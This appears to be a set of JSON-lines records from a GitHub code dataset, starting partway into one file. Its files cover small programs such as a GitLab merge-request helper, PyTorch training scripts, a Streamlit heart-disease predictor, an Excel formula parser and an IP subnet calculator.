Name\"))\r\n\t\t\tself.dlgHighScores.replaceName(oldname, self.username, self.score)\r\n\t\t\tif self.dlgSubmit.username == '':\r\n\t\t\t\tself.dlgSubmit.setUsername(self.username)\r\n\t\tLOG('OC2')\r\n\t\tif control == self.btnNewGame:\r\n\t\t\tLOG('OC2.3')\r\n\t\t\tself.retVal = True\r\n\t\t\txbmcgui.lock()\r\n\t\t\tself.close()\r\n\t\tLOG('OC3')\r\n\t\tif control == self.btnQuit:\r\n\t\t\tself.retVal = False\r\n\t\t\txbmcgui.lock()\r\n\t\t\tself.close()\r\n\t\tLOG('OC4')\r\n\t\tif control == self.btnSubmit:\r\n\t\t\tself.focusWindow = WINDOW_SUBMIT\r\n\t\t\tself.dlgSubmit.doModal()\r\n\t\t\tself.focusWindow = WINDOW_GAME\r\n\t\tLOG('OC5')\r\n\t\tif control == self.btnHighScores:\r\n\t\t\tself.focusWindow = WINDOW_HIGHSCORE\r\n\t\t\tself.dlgHighScores.doModal()\r\n\t\t\tself.focusWindow = WINDOW_GAME\r\n\t\tLOG('OC6')\r\n\r\n\tdef onAction(self, action):\r\n\t\tif not self.focusWindow == WINDOW_GAME:\r\n\t\t\treturn\r\n\t\tif action in (ACTION_PREVIOUS_MENU, ACTION_PARENT_DIR, ACTION_STOP):\r\n\t\t\tself.focusWindow = WINDOW_NONE\r\n\t\t\tself.close()","repo_name":"tcowans/passion-xbmc","sub_path":"addons/dharma/script.game.tetris/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":19135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15103313479","text":"H,W=map(int,input().split())\r\nA=[]\r\nindh=[]\r\nindw=[]\r\nA=[list(input()) for _ in range(H)] \r\nfor i in reversed(range(H)):\r\n if set(A[i])==set('.'):\r\n A.pop(i)\r\nimport numpy as np\r\nAT=list(np.array(A).T)\r\nansT=[]\r\nfor i in range(W):\r\n if set(AT[i])!=set('.'):\r\n ansT.append(AT[i])\r\nfor a in list(np.array(ansT).T):\r\n print(''.join(a))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc107/B/4870804.py","file_name":"4870804.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"888882820","text":"import datetime\nimport logging\n\nfrom gorrabot.api.gitlab import gitlab_session, GITLAB_API_PREFIX\nfrom gorrabot.api.gitlab.projects import get_project_name\nfrom gorrabot.api.gitlab.utils import paginated_get\nfrom gorrabot.api.utils import parse_api_date\nfrom gorrabot.config import config\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_merge_requests(project_id: int, filters=None):\n if filters is None:\n filters = {}\n url = f'{GITLAB_API_PREFIX}/projects/{project_id}/merge_requests'\n return paginated_get(url, filters)\n\n\ndef mr_url(project_id, iid):\n return '{}/projects/{}/merge_requests/{}'.format(\n GITLAB_API_PREFIX, project_id, iid)\n\n\ndef get_mr_changes(project_id: int, iid: int):\n url = mr_url(project_id, iid) + '/changes'\n res = gitlab_session.get(url)\n res.raise_for_status()\n return res.json()['changes']\n\n\ndef get_mr(project_id: int, iid: int):\n url = f'{GITLAB_API_PREFIX}/projects/{project_id}/merge_requests/{iid}'\n res = gitlab_session.get(url)\n res.raise_for_status()\n return res.json()\n\n\ndef get_mr_last_commit(mr: dict):\n project_id = mr['source_project_id']\n url = mr_url(project_id, mr['iid']) + '/commits'\n res = gitlab_session.get(url)\n res.raise_for_status()\n try:\n return res.json()[0]\n except IndexError:\n return\n\n\ndef create_mr(project_id: int, mr_data: dict):\n url = (\n f\"{GITLAB_API_PREFIX}/projects/{project_id}/\"\n f\"merge_requests\"\n )\n res = gitlab_session.post(url, json=mr_data)\n res.raise_for_status()\n return res.json()\n\n\ndef set_wip(project_id: int, iid: int):\n url = mr_url(project_id, iid)\n res = gitlab_session.get(url)\n res.raise_for_status()\n mr = res.json()\n\n if not mr['work_in_progress'] and not mr['title'].startswith('WIP:') and not mr['title'].startswith('Draft:'):\n data = {\"title\": \"Draft: \" + mr['title']}\n update_mr(project_id, iid, data)\n else:\n logger.info(\"Is currently in WIP/Draft\")\n\n\ndef update_mr(project_id: int, iid: int, data: dict):\n url = mr_url(project_id, iid)\n res = gitlab_session.put(url, json=data)\n res.raise_for_status()\n return res.json()\n\n\ndef get_related_merge_requests(project_id: int, issue_iid: int):\n url = '{}/projects/{}/issues/{}/related_merge_requests'.format(\n GITLAB_API_PREFIX, project_id, issue_iid)\n return paginated_get(url)\n\n\ndef comment_mr(project_id: int, iid: int, body: str, can_be_duplicated=True, min_time_between_comments=None):\n project_name = get_project_name(project_id)\n can_comment_mr = config()['projects'][project_name].get('comment_mr', True)\n\n if not can_comment_mr or not isinstance(can_comment_mr, bool):\n return\n\n if not can_be_duplicated:\n # Ugly hack to drop user mentions from body\n search_title = body.split(': ', 1)[-1]\n res = gitlab_session.get(mr_url(project_id, iid) + '/notes')\n res.raise_for_status()\n comments = res.json()\n if any(search_title in comment['body']\n for comment in comments):\n # This comment has already been made\n return\n elif min_time_between_comments is not None:\n # The comment can be duplicated, but to avoid flooding, wait at least\n # min_time_between_comments to duplicate them\n # Ugly hack to drop user mentions from body\n search_title = body.split(': ', 1)[-1]\n res = gitlab_session.get(mr_url(project_id, iid) + '/notes')\n res.raise_for_status()\n comments = res.json()\n\n def is_recent_comment(comment):\n time_passed = datetime.datetime.utcnow() - parse_api_date(comment['created_at'])\n return time_passed < min_time_between_comments\n\n if any(is_recent_comment(comment) and\n search_title.strip() in comment['body'].strip()\n for comment in comments):\n return\n\n url = mr_url(project_id, iid) + '/notes'\n data = {\"body\": body}\n res = gitlab_session.post(url, json=data)\n res.raise_for_status()\n return res.json()\n","repo_name":"infobyte/gorrabot","sub_path":"gorrabot/api/gitlab/merge_requests.py","file_name":"merge_requests.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"22878718128","text":"#Задача 3. Файлы\r\n\r\nspec_symbol = '@№$%^&*().'\r\nextension_file = ['.txt','.docx']\r\nname_file = input(\"Название файла: \")\r\nwhile True:\r\n for symbol in spec_symbol:\r\n if name_file.startswith(symbol):\r\n print(\"Ошибка: название начинается на один из специальных символов.\")\r\n name_file = input(\"[Error] Введите название файла снова: \")\r\n if name_file.endswith('.txt') == False and name_file.endswith('.docx') == False:\r\n print(\"Ошибка: неверное расширение файла. Ожидалось .txt или .docx.\")\r\n name_file = input(\"[Error] Введите название файла снова: \")\r\n else:\r\n print(\"Файл назван верно.\")\r\n break","repo_name":"ISeravin/skillbox","sub_path":"module18/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36291501976","text":"import logging\nimport traceback\nfrom fastnumbers import fast_real\nlogger = logging.getLogger(__name__)\nfrom rpnnode import RPNNode, OperatorNode, RangeNode, OperandNode, FunctionNode, CellNode\nfrom networkx.classes.digraph import DiGraph\nfrom tokenizer import Tokenizer, Token\n\nclass Cell:\n \"\"\"\n Class responsible for creating cell objects from source addresses\n \"\"\"\n\n def __init__(self ,address):\n \"\"\"\n Each cell object is initalized with:\n - address, excel formula, value, rpn formula, col_field\n @param address:\n \"\"\"\n self.address = address\n self.value = None\n self.prec = []\n self._formula = None\n self.rpn = []\n self.tree = None\n self.needs_calc = True\n\n def __repr__(self):\n '''Represents a cell object by outputting the address, value and excel formula'''\n cell_str = 'A:{}, V:{}, F:{}'.format(self.address ,self.value ,self.formula)\n return cell_str\n\n @property\n def formula(self):\n return self._formula\n\n @formula.setter\n def formula(self, excel_formula):\n '''\n If excel formula is set, this TRIGGERS creation of rpn formula and tree\n @param excel_formula: excel formula as a string\n @return: rpn formula\n '''\n self._formula = excel_formula\n logging.debug(\"Processing RPN for formula {} at cell {}\".format(excel_formula,self))\n\n #First check if formula starts with correct operator\n if str(excel_formula).startswith(('=','+')):\n self.rpn = self.make_rpn(excel_formula)\n\n # creates list of precedents (who do I depend on)\n self.createPrec()\n\n # This means formula must be a hardcode\n else:\n logging.debug(\"Formula does not start with = or +. Creating a hardcode cell\")\n if isinstance(fast_real(self.address),str):\n tok = Token(self.address,Token.OPERAND,\"TEXT\")\n self.rpn.append(OperandNode(tok))\n self.needs_calc = False\n else:\n tok = Token(self.address, Token.OPERAND, \"NUMBER\")\n self.rpn.append(OperandNode(tok))\n\n logging.info(\"RPN is: {}\".format(self.rpn))\n\n def createPrec(self):\n for node in self.rpn:\n if isinstance(node,RangeNode):\n self.prec.extend(node.prec_in_range)\n elif isinstance(node,CellNode):\n self.prec.append(node.prec_in_range)\n\n def make_node(self, token):\n\n #Extract sheet name\n sheet = self.address.split('!')[0]\n\n #Remove absolute reference $\n token.value = token.value.replace('$','')\n\n return RPNNode.create(token, sheet)\n\n\n def make_rpn(self, expression):\n \"\"\"\n Parse an excel formula expression into reverse polish notation\n\n Core algorithm taken from wikipedia with varargs extensions from\n http://www.kallisti.net.nz/blog/2008/02/extension-to-the-shunting-yard-\n algorithm-to-allow-variable-numbers-of-arguments-to-functions/\n \"\"\"\n\n \"\"\"\n Parse an excel formula expression into reverse polish notation\n\n Core algorithm taken from wikipedia with varargs extensions from\n http://www.kallisti.net.nz/blog/2008/02/extension-to-the-shunting-yard-\n algorithm-to-allow-variable-numbers-of-arguments-to-functions/\n \"\"\"\n\n lexer = Tokenizer(expression)\n\n # amend token stream to ease code production\n tokens = []\n for token, next_token in zip(lexer.items, lexer.items[1:] + [None]):\n\n if token.matches(Token.FUNC, Token.OPEN):\n tokens.append(token)\n token = Token('(', Token.PAREN, Token.OPEN)\n\n elif token.matches(Token.FUNC, Token.CLOSE):\n token = Token(')', Token.PAREN, Token.CLOSE)\n\n elif token.matches(Token.ARRAY, Token.OPEN):\n tokens.append(token)\n tokens.append(Token('(', Token.PAREN, Token.OPEN))\n tokens.append(Token('', Token.ARRAYROW, Token.OPEN))\n token = Token('(', Token.PAREN, Token.OPEN)\n\n elif token.matches(Token.ARRAY, Token.CLOSE):\n tokens.append(token)\n token = Token(')', Token.PAREN, Token.CLOSE)\n\n elif token.matches(Token.SEP, Token.ROW):\n tokens.append(Token(')', Token.PAREN, Token.CLOSE))\n tokens.append(Token(',', Token.SEP, Token.ARG))\n tokens.append(Token('', Token.ARRAYROW, Token.OPEN))\n token = Token('(', Token.PAREN, Token.OPEN)\n\n elif token.matches(Token.PAREN, Token.OPEN):\n token.value = '('\n\n elif token.matches(Token.PAREN, Token.CLOSE):\n token.value = ')'\n\n tokens.append(token)\n\n output = []\n stack = []\n were_values = []\n arg_count = []\n\n # shunting yard start\n for token in tokens:\n\n if token.type == token.OPERAND:\n output.append(self.make_node(token))\n if were_values:\n were_values[-1] = True\n\n elif token.type != token.PAREN and token.subtype == token.OPEN:\n\n if token.type in (token.ARRAY, Token.ARRAYROW):\n token = Token(token.type, token.type, token.subtype)\n\n stack.append(token)\n arg_count.append(0)\n if were_values:\n were_values[-1] = True\n were_values.append(False)\n\n elif token.type == token.SEP:\n\n while stack and (stack[-1].subtype != token.OPEN):\n output.append(self.make_node(stack.pop()))\n\n if not len(were_values):\n raise FormulaParserError(\n \"Mismatched or misplaced parentheses\")\n\n were_values.pop()\n arg_count[-1] += 1\n were_values.append(False)\n\n elif token.is_operator:\n\n while stack and stack[-1].is_operator:\n if token.precedence < stack[-1].precedence:\n output.append(self.make_node(stack.pop()))\n else:\n break\n\n stack.append(token)\n\n elif token.subtype == token.OPEN:\n assert token.type in (token.FUNC, token.PAREN, token.ARRAY)\n stack.append(token)\n\n elif token.subtype == token.CLOSE:\n\n while stack and stack[-1].subtype != Token.OPEN:\n output.append(self.make_node(stack.pop()))\n\n if not stack:\n raise FormulaParserError(\n \"Mismatched or misplaced parentheses\")\n\n stack.pop()\n\n if stack and stack[-1].is_funcopen:\n f = self.make_node((stack.pop()))\n f.num_args = arg_count.pop() + int(were_values.pop())\n output.append(f)\n\n else:\n assert token.type == token.WSPACE, \\\n 'Unexpected token: {}'.format(token)\n\n while stack:\n if stack[-1].subtype in (Token.OPEN, Token.CLOSE):\n raise FormulaParserError(\"Mismatched or misplaced parentheses\")\n\n output.append(self.make_node(stack.pop()))\n return output\n\n\n\n\n# if __name__ == \"__main__\":\n\n","repo_name":"tactycHQ/Saturn","sub_path":"Saturn/cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6115001455","text":"import torch\n\ndef validation_metrics (model, valid_dl, loss_func, device, accuracy_metric, y_to_device):\n \"\"\"Funkcija koja tvalidira model\n\n Arguments:\n model (:obj):\n Model koji zelimo trenirat.\n valid_dl (`DataLoader`):\n Data loader za validacijske podatke.\n loss_func (:obj):\n Loss funkcija kojom treniramo.\n device (:obj):\n Uredaj na kojem treniramo.\n accuracy_metric (:func):\n Funkcija kojom provjeravamo preciznost.\n y_to_device (:func):\n Funkcija kojom prebacujemo y na uredaj.\n\n Returns:\n `float`: Loss validacijskih podataka,\n `float`: Preciznost validacijskih podataka\n \"\"\"\n model.eval()\n accuracy = 0\n count = 0\n total = 0\n sum_loss = 0.0\n for x, y, l in valid_dl:\n x = x.long().to(device)\n y = y_to_device(y, device)\n y_hat = model(x, l)\n loss = loss_func(y_hat, y)\n #prima posebnu funkciju za preciznost jer ona ovisi o modelu\n accuracy += accuracy_metric(y_hat, y)\n total += x.shape[0]\n count += 1\n sum_loss += loss.item()*x.shape[0]\n return sum_loss/total, accuracy/total","repo_name":"lbuday/praksa-talentlyft","sub_path":"model_1/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2532782080","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\ndefine model \r\n\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n# define cnn model \r\nclass cnn_autoencoder(nn.Module):\r\n def __init__(self):\r\n super(cnn_autoencoder, self).__init__()\r\n \r\n self.act = nn.ReLU()\r\n self.flat = nn.Flatten()\r\n self.sig = nn.Sigmoid()\r\n\r\n self.c1 = nn.Conv2d(1, 16, 3, stride=2, padding=1)\r\n self.c2 = nn.Conv2d(16, 32, 3, stride=2, padding=1)\r\n self.c3 = nn.Conv2d(32, 64, 7)\r\n\r\n self.t1 = nn.ConvTranspose2d(64, 32, 7)\r\n self.t2 = nn.ConvTranspose2d(32, 16, 3, stride=2, padding=1, output_padding=1)\r\n self.t3 = nn.ConvTranspose2d(16, 1, 3, stride=2, padding=1, output_padding=1)\r\n\r\n def forward(self, image):\r\n # encode image\r\n img = self.act(self.c1(image))\r\n img = self.act(self.c2(img))\r\n img = self.flat(self.c3(img))\r\n\r\n # decode image\r\n img = img.view(-1, 64, 1, 1)\r\n img = self.act(self.t1(img))\r\n img = self.act(self.t2(img))\r\n img = self.sig(self.t3(img))\r\n \r\n return img","repo_name":"assayer5/pytorch-image-clustering","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21160053011","text":"import torch\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch import nn, optim\n\nfrom Lenet5 import Lenet5\n\n\ndef main():\n batchsz = 128\n lr = 1e-3\n epochs = 1000\n\n cifar_train = datasets.CIFAR10('./data/cifar',\n train=True,\n download=True,\n transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]))\n cifar_test = datasets.CIFAR10('./data/cifar',\n train=False,\n download=True,\n transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]))\n\n cifar_train = torch.utils.data.DataLoader(cifar_train,\n batch_size=batchsz,\n shuffle=True)\n cifar_test = torch.utils.data.DataLoader(cifar_test,\n batch_size=batchsz,\n shuffle=True)\n\n x, label = iter(cifar_train).next()\n print('x:', x.shape, 'label:', label.shape)\n\n model = Lenet5()\n criteon = nn.CrossEntropyLoss()\n optimzer = optim.Adam(model.parameters(), lr=lr)\n\n print(model)\n\n for epoch in range(epochs):\n\n model.train()\n for batchidx, (x, label) in enumerate(cifar_train):\n\n # forward propagation\n logits = model(x)\n # logits: [b, 10]\n # label: [b]\n # loss: tensor scalar\n loss = criteon(logits, label)\n\n # back propagation\n optimzer.zero_grad()\n loss.backward()\n optimzer.step()\n\n print('epoch: ', epoch, 'loss: ', loss.item())\n\n model.eval()\n with torch.no_grad():\n total_correct = 0\n total_num = 0\n\n for x, label in cifar_test:\n logits = model(x)\n\n pred = logits.argmax(dim=1)\n\n correct = torch.eq(pred, label).float().sum().item()\n total_correct += correct\n total_num += x.size(0)\n\n acc = total_correct / total_num\n print('epoch: ', epoch, 'test acc: ', acc)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"luninsun/PyTorch-Learning","sub_path":"Lenet5Demo.py","file_name":"Lenet5Demo.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14356139261","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport pickle\n\nst.write(\"\"\"\n# Heart Disease Prediction App\n\"\"\")\n\nst.sidebar.header('User Input Features')\n\nGeneral_Health = st.sidebar.selectbox(\n 'General_Health', ('Poor', 'Very Good', 'Good', 'Fair', 'Excellent'))\nCheckup = st.sidebar.selectbox('Checkup', ('Within the past 2 years', 'Within the past year', '5 or more years ago',\n 'Within the past 5 years', 'Never'))\nExercise = st.sidebar.selectbox('Exercise', ('No', 'Yes'))\nSkin_Cancer = st.sidebar.selectbox('Skin_Cancer', ('No', 'Yes'))\nOther_Cancer = st.sidebar.selectbox('Other_Cancer', ('No', 'Yes'))\nDepression = st.sidebar.selectbox('Depression', ('No', 'Yes'))\nDiabetes = st.sidebar.selectbox('Diabetes', ('No', 'Yes', 'No, pre-diabetes or borderline diabetes',\n 'Yes, but female told only during pregnancy'))\nArthritis = st.sidebar.select_slider('Arthritis', ('No', 'Yes'))\nSex = st.sidebar.selectbox('Sex', ('Female', 'Male'))\nAge_Category = st.sidebar.selectbox('Age_Category', ('70-74', '60-64', '75-79', '80+', '65-69', '50-54', '45-49', '18-24', '30-34',\n '55-59', '35-39', '40-44', '25-29'))\nBMI = st.sidebar.slider('BMI', 10, 60, 100)\nSmoking_History = st.sidebar.selectbox('Smoking_History', ('Yes', 'No'))\nAlcohol_Consumption = st.sidebar.slider('Alcohol_Consumption', 0.0, 20.0, 40.0)\nFruit_Consumption = st.sidebar.slider('Fruit_Consumption', 0.0, 60.0, 120.0)\nGreen_Vegetables_Consumption = st.sidebar.slider(\n 'Green_Vegetables_Consumption', 0.0, 70.0, 140.0)\nFriedPotato_Consumption = st.sidebar.slider(\n 'FriedPotato_Consumption', 0.0, 70.0, 140.0)\n\ndata = {\n 'General_Health': General_Health,\n 'Checkup': Checkup,\n 'Exercise': Exercise,\n 'Skin_Cancer': Skin_Cancer,\n 'Other_Cancer': Other_Cancer,\n 'Depression': Depression,\n 'Diabetes': Diabetes,\n 'Arthritis': Arthritis,\n 'Sex': Sex,\n 'Age_Category': Age_Category,\n 'BMI': BMI,\n 'Smoking_History': Smoking_History,\n 'Alcohol_Consumption': Alcohol_Consumption,\n 'Fruit_Consumption': Fruit_Consumption,\n 'Green_Vegetables_Consumption': Green_Vegetables_Consumption,\n 'FriedPotato_Consumption': FriedPotato_Consumption\n}\n\ninput_df = pd.DataFrame(data, index=[0])\ndf_new = pd.read_csv('CVD_newfile.csv')\ndf_new.drop(columns=df_new.columns[0], axis=1, inplace=True)\ndf_new.drop('Heart_Disease', axis=1, inplace=True)\ndf = pd.concat([input_df, df_new], axis=0)\n\ncategorical = df.select_dtypes(include=['object']).columns.sort_values()\n# categorical=categorical.drop('Heart_Disease')\n# df.drop(['Height_(cm)','Weight_(kg)'], axis=1, inplace=True)\n\nfor col in categorical:\n dummy = pd.get_dummies(df[col], prefix=col)\n df = pd.concat([df, dummy], axis=1)\n del df[col]\ndf = df[:1]\n\nst.subheader('User Input features')\nst.write(df)\n\nload_model = pickle.load(open('heart_model_1.pkl', 'rb'))\n\n# Apply model to make predictions\npreds = load_model.predict(df)\nprediction = (preds > 0.5).astype(int)\n\nprediction_proba = load_model.predict_proba(df)\n\nst.subheader('Prediction')\nheart_disease = np.array(['No', 'Yes'])\nst.write(heart_disease[prediction])\n\nst.subheader('Prediction Probability')\nst.write(prediction_proba)\n","repo_name":"iaf12/Heart_Disease_Risk_Prediction_With_Streamlit","sub_path":"heart_app.py","file_name":"heart_app.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73897460391","text":"from app.elastic.connect import connect_elasticsearch\n\n\ndef create_geo_mapping():\n \"\"\"Create the geo mapping.\"\"\"\n mapping = {\n \"mappings\": {\n \"properties\": {\n \"pin\": {\n \"properties\": {\n \"location\": {\n \"type\": \"geo_point\"\n }\n }\n }\n }\n }\n }\n es = connect_elasticsearch()\n es.indices.create(index=\"michelin_restaurants\", body=mapping)\n\n\nif __name__ == \"__main__\":\n create_geo_mapping()\n","repo_name":"johannesocean/elastic","sub_path":"app/elastic/load/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13590145437","text":"import numpy as np\ndef load(fname):\n z = []\n for epoch in range(1,51):\n w = np.load(fname+'/w_sample_'+str(epoch)+'.npy',allow_pickle=True)[1]\n z.append(w)\n\n z = np.array(z)\n\n zz = np.transpose(z, (1,2,4,3,0))\n zz = zz.reshape((zz.shape[0]*zz.shape[1]*zz.shape[2],zz.shape[3],-1))\n return zz\n\ndef converiance(x,y):\n x -= np.mean(x)\n y -= np.mean(y)\n z = (np.mean(x*y))/(np.sqrt(np.mean(x*x)*np.mean(y*y)))\n if z==float('Inf') or z==-float('Inf'):\n return 1\n else:\n return z\n\nsplit = 4 \n\nlr_ = [0.1, 0.03]\ndrop_rate_ = [0.0, 0.15, 0.3]\nwidth_ = [1., 0.5]\nbatch_size_ = [64, 256]\nweight_decay_ = [0.0, 0.0005]\n\nact = 'relu'\nfor net in ['vgg11_relu/','vgg16_relu/','vgg19_relu/']:\n sampling_det = []\n for weight_decay in weight_decay_:\n for drop_rate in drop_rate_:\n for width in width_:\n for batch_size in batch_size_:\n for lr in lr_:\n fname = net+str(lr)+'_'+str(drop_rate)+'_'+str(width)+'_'+str(batch_size)+'_'+str(weight_decay)+'_'+str(act) \n zz = load(fname) \n det = []\n for zzz in zz[:400]:\n deet = 0\n for i in range(int(len(zzz)/split)):\n corr = np.ones((split,split))\n for x in range(split):\n for y in range(split):\n if x!=y:\n corr[x][y]=converiance(zzz[x+i*split],zzz[y+i*split])\n deet += np.linalg.det(corr)\n if not np.isnan(deet):\n det.append(deet*split/len(zzz))\n\n det = np.array(det) \n if np.isnan(np.mean(det)):\n sampling_det.append(0.4)\n else:\n sampling_det.append(np.mean(det))\n print('complete '+fname)\n np.save(net+'sampling_det.npy',np.array(sampling_det))","repo_name":"Alexkael/Weight_Expansion","sub_path":"Experiment_5.2/VGG_CIFAR10/rawdata/sampling_det.py","file_name":"sampling_det.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73470199273","text":"import Decimal\n\n\ndef DecBin(Transformar):\n Lista = Transformar.split('.')\n\n Transformado = '' # string de ip binario\n j = 3 # 4 octeto\n while j >= 0:\n # Seleciona o octeto\n temp = int(Lista[j]) # transforma um pedaço do octeto em inteiro decimal\n i = 7 # 8 bits\n while i >= 0:\n # Gerador do binario por octeto\n Bit = int(temp % 2) # coleta o inteiro do mod\n Transformado = str(Bit) + Transformado # concatena o resultado na string\n temp = temp / 2 # captura o proximo numero a ser transformado em 0 ou 1\n i = i - 1\n if j != 0:\n Transformado = '.' + Transformado # string armazenadora\n j = j - 1\n\n return Transformado\n\n\ndef BinIP(IP):\n return DecBin(IP)\n\n\ndef BinMask(CIDR):\n # calcula a mascara para uma string binaria\n m = 0\n contador = 0\n maskbin = '' # string de mascara binaria\n\n while m < 32:\n if contador == 8: # separa o octeto\n maskbin = maskbin + '.'\n contador = 0\n\n # Verifica se o bit vai ser 0 ou 1\n if m <= int(CIDR - 1):\n maskbin = maskbin + '1'\n else:\n maskbin = maskbin + '0'\n\n m = m + 1\n contador = contador + 1\n return maskbin\n\n\ndef BinWild(CIDR):\n # calcula a mascara para uma string binaria\n m = 0\n contador = 0\n wildbin = '' # string de wildcard binaria\n\n while m < 32:\n if contador == 8: # separa o octeto\n wildbin = wildbin + '.'\n contador = 0\n\n # Verifica se o bit vai ser 0 ou 1\n if m <= int(CIDR - 1):\n wildbin = wildbin + '0'\n else:\n wildbin = wildbin + '1'\n\n m = m + 1\n contador = contador + 1\n return wildbin\n\n\ndef BinBroad(IP, CIDR):\n return DecBin(Decimal.DecBroadcast(IP, CIDR))\n\n\ndef BinHostMin(IP, CIDR):\n return DecBin(Decimal.DecHostMin(IP, CIDR))\n\n\ndef BinHostMax(IP, CIDR):\n return DecBin(Decimal.DecHostMax(IP, CIDR))\n\n\ndef BinNetwork(IP, CIDR):\n ip = BinIP(IP).split('.')\n mask = BinMask(CIDR).split('.')\n network = ''\n\n j = 3 # 4 octeto\n while j >= 0:\n # Seleciona o octeto\n tempip = (ip[j]) # transforma um pedaço do octeto em inteiro decimal\n tempmask = (mask[j]) # transforma um pedaço do octeto em inteiro decimal\n i = 7 # 8 bits\n while i >= 0:\n if tempip[i] == '1' and tempmask[i] == '1':\n network = '1' + network\n else:\n network = '0' + network\n i = i - 1\n if j != 0:\n network = '.' + network # string armazenadora\n j = j - 1\n return network\n","repo_name":"andrelteixeira/IPcalc-Calcuradora_de_IP","sub_path":"Binarios.py","file_name":"Binarios.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70154206314","text":"import flask\nimport requests\nimport urllib\n\nfrom .app import app\nfrom .helpers import (\n api_host,\n redirect,\n)\n\n\ndef api_call(method, path, params=None, json=None, session=None, return_errors=False):\n url = api_host() + \"/\" + \"/\".join(urllib.parse.quote(p, safe=\"\") for p in path)\n headers = None\n if session and session.api_token:\n headers = {\"Authorization\": \"Bearer \" + session.api_token}\n\n error_response = redirect(\"error\", message=\"API call failed; sorry for the inconvenience\")\n try:\n r = method(url, params=params, headers=headers, json=json)\n\n success = r.status_code in (200, 201, 204)\n if not success:\n app.logger.warning(\"API failed: {} {}\".format(r.status_code, r.text))\n\n if success:\n result = None\n try:\n result = r.json()\n except Exception:\n result = None\n if return_errors:\n return (result, None)\n else:\n return result\n elif r.status_code == 404:\n if return_errors:\n return (None, \"Data not found\")\n error_response = redirect(\"error\", message=\"Data not found\")\n elif r.status_code == 400 and path[0] == \"server\":\n error_response = redirect(\"error\", message=\"Unknown server\")\n elif return_errors:\n error = str(r.json().get(\"errors\", \"API call failed\"))\n return (None, error)\n except Exception:\n # If anything failed we did not capture, return the latest error we\n # have to the caller.\n pass\n\n if not return_errors:\n flask.abort(error_response)\n\n return (None, \"API call failed\")\n\n\ndef api_get(*args, **kwargs):\n return api_call(requests.get, *args, **kwargs)\n","repo_name":"OpenTTD/master-server-web","sub_path":"webclient/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15039490539","text":"N = int(input())\r\nH = [0]*N\r\nS = [0]*N\r\n \r\nfor i in range(N):\r\n H[i], S[i] = map(int, input().split())\r\n \r\ndef check_P(p):\r\n #???P????????????????\r\n #p???????????????????????\r\n T = [0]*N\r\n for i in range(N):\r\n T[i] = int((p - H[i]) / S[i])\r\n sorted_index_T = sorted(range(len(T)), key=lambda k: T[k])\r\n for (k,i) in enumerate(sorted_index_T):\r\n if (T[i] < k):\r\n return False\r\n return True\r\n \r\n#p?2??????\r\nP_low = 0\r\nP_high = 0\r\nfor i in range(N):\r\n p = H[i]\r\n if (P_low < p):\r\n P_low = p\r\n p = H[i] + S[i]*(N-1)\r\n if (P_high < p):\r\n P_high = p\r\nP_low -= 1\r\n\r\nwhile(True):\r\n P_now = int((P_low + P_high) / 2)\r\n #print(_, P_low, P_now, P_high)\r\n \r\n if (check_P(P_now)):\r\n P_high = P_now\r\n else:\r\n P_low = P_now\r\n if (P_high <= (P_low + 1)):\r\n print(P_high)\r\n break","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc023/D/3997044.py","file_name":"3997044.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"20841166862","text":"# 2x3の配列に行を追加する\nimport numpy as np\n\n\na = np.array([ 1, 2, 3, 4, 5, 6]).reshape(2, 3)\nprint(a)\n\nb = np.append(a, [[7, 8, 9]], axis=0)\n# [[7, 8, 9]] 配列aに合わせて2次元配列で追加する\n# axis=0 